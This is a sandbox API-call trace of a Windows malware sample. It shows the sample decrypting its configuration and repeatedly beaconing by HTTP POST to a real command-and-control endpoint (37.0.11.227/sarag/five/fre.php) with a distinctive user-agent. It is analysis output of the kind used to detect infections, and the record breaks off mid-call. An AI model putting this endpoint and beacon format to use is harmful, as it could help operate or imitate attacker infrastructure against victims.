(lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0259.407] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.407] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0259.408] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.408] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0259.408] GetProcessHeap () returned 0x690000 [0259.408] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0259.408] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0259.409] GetProcessHeap () returned 0x690000 [0259.409] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0259.409] GetProcessHeap () returned 0x690000 [0259.409] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0259.409] GetProcessHeap () returned 0x690000 [0259.410] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0259.410] GetProcessHeap () returned 0x690000 [0259.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0259.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.411] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0259.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.423] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0259.432] GetProcessHeap () returned 0x690000 [0259.432] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0259.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.433] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0259.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.434] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0259.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.435] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0259.435] GetProcessHeap () returned 0x690000 [0259.435] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0259.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.450] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0259.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.451] CryptDestroyKey (hKey=0x69d028) returned 1 [0259.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.452] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0259.452] GetProcessHeap () returned 0x690000 [0259.452] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0259.453] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.455] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0259.456] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.456] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0259.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.459] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0259.460] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.461] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0259.461] GetProcessHeap () returned 0x690000 [0259.461] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0259.461] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0259.461] GetProcessHeap () returned 0x690000 [0259.461] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0259.461] socket (af=2, type=1, protocol=6) returned 0x77c [0259.461] connect (s=0x77c, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0259.488] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0259.488] GetProcessHeap () returned 0x690000 [0259.488] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0259.488] GetProcessHeap () returned 0x690000 [0259.488] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0259.489] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0259.493] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0259.493] GetProcessHeap () returned 0x690000 [0259.493] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0259.493] GetProcessHeap () returned 0x690000 [0259.493] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0259.493] GetProcessHeap () returned 0x690000 [0259.493] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0259.493] GetProcessHeap () returned 0x690000 [0259.493] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0259.494] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0259.495] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0259.495] GetProcessHeap () returned 0x690000 [0259.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0259.495] GetProcessHeap () returned 0x690000 [0259.495] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0259.496] send (s=0x77c, buf=0x6ab500*, len=242, flags=0) returned 242 [0259.496] send (s=0x77c, buf=0x6aba40*, len=159, flags=0) returned 159 [0259.497] GetProcessHeap () returned 0x690000 [0259.497] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0259.499] recv (in: s=0x77c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0259.576] GetProcessHeap () returned 0x690000 [0259.577] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0259.577] GetProcessHeap () returned 0x690000 [0259.577] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0259.577] GetProcessHeap () returned 0x690000 [0259.577] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0259.577] GetProcessHeap () returned 0x690000 [0259.577] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0259.578] closesocket (s=0x77c) returned 0 [0259.578] GetProcessHeap () returned 0x690000 [0259.578] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0259.578] GetProcessHeap () returned 0x690000 [0259.578] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0259.579] GetProcessHeap () returned 0x690000 [0259.579] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0259.579] GetProcessHeap () returned 0x690000 [0259.579] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0259.579] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1524) returned 0x77c [0259.581] Sleep (dwMilliseconds=0xea60) [0259.596] GetProcessHeap () returned 0x690000 [0259.596] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0259.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.597] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0259.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.606] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0259.615] GetProcessHeap () returned 0x690000 [0259.615] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0259.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.617] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0259.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.626] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0259.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.628] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0259.628] GetProcessHeap () returned 0x690000 [0259.628] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0259.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.636] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0259.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.638] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0259.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.640] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0259.640] GetProcessHeap () returned 0x690000 [0259.640] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0259.641] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.642] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0259.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.644] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0259.645] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.646] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0259.647] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.647] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0259.647] GetProcessHeap () returned 0x690000 [0259.647] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0259.647] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0259.648] GetProcessHeap () returned 0x690000 [0259.648] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0259.648] GetProcessHeap () returned 0x690000 [0259.649] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0259.649] GetProcessHeap () returned 0x690000 [0259.649] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0259.650] GetProcessHeap () returned 0x690000 [0259.651] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0259.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.652] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0259.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.752] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0259.770] GetProcessHeap () returned 0x690000 [0259.770] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0259.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.771] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0259.792] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.793] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0259.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.794] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0259.795] GetProcessHeap () returned 0x690000 [0259.795] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0259.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.801] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0259.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.804] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0259.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.806] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0259.806] GetProcessHeap () returned 0x690000 [0259.806] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0259.807] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.834] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0259.836] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.837] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0259.838] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.838] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0259.839] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.840] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0259.840] GetProcessHeap () returned 0x690000 [0259.840] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0259.841] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0259.841] GetProcessHeap () returned 0x690000 [0259.841] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab490 [0259.841] socket (af=2, type=1, protocol=6) returned 0x780 [0259.842] connect (s=0x780, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0259.878] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0259.878] GetProcessHeap () returned 0x690000 [0259.879] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0259.879] GetProcessHeap () returned 0x690000 [0259.879] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0259.880] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0259.882] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0259.882] GetProcessHeap () returned 0x690000 [0259.882] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0259.882] GetProcessHeap () returned 0x690000 [0259.882] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0259.882] GetProcessHeap () returned 0x690000 [0259.882] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0259.883] GetProcessHeap () returned 0x690000 [0259.883] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0259.883] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0259.884] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0259.885] GetProcessHeap () returned 0x690000 [0259.885] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0259.885] GetProcessHeap () returned 0x690000 [0259.885] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0259.888] send (s=0x780, buf=0x6ad508*, len=242, flags=0) returned 242 [0259.889] send (s=0x780, buf=0x6aba40*, len=159, flags=0) returned 159 [0259.889] GetProcessHeap () returned 0x690000 [0259.889] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0259.889] recv (in: s=0x780, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0259.970] GetProcessHeap () returned 0x690000 [0259.970] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0259.972] GetProcessHeap () returned 0x690000 [0259.972] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0259.972] GetProcessHeap () returned 0x690000 [0259.973] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0259.973] GetProcessHeap () returned 0x690000 [0259.973] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0259.974] closesocket (s=0x780) returned 0 [0259.974] GetProcessHeap () returned 0x690000 [0259.974] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab490 | out: hHeap=0x690000) returned 1 [0259.974] GetProcessHeap () returned 0x690000 [0259.975] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0259.975] GetProcessHeap () returned 0x690000 [0259.976] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0259.976] GetProcessHeap () returned 0x690000 [0259.976] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0259.977] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1528) returned 0x780 [0259.982] Sleep (dwMilliseconds=0xea60) [0259.984] GetProcessHeap () returned 0x690000 [0259.984] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0259.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.986] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0259.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0259.998] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0260.020] GetProcessHeap () returned 0x690000 [0260.020] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0260.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.025] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0260.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.027] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0260.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.029] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.029] GetProcessHeap () returned 0x690000 [0260.029] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0260.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.032] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0260.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.041] CryptDestroyKey (hKey=0x69d628) returned 1 [0260.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.042] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0260.042] GetProcessHeap () returned 0x690000 [0260.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0260.044] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.044] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0260.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.046] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0260.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.048] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0260.050] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.050] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0260.050] GetProcessHeap () returned 0x690000 [0260.050] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0260.050] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: 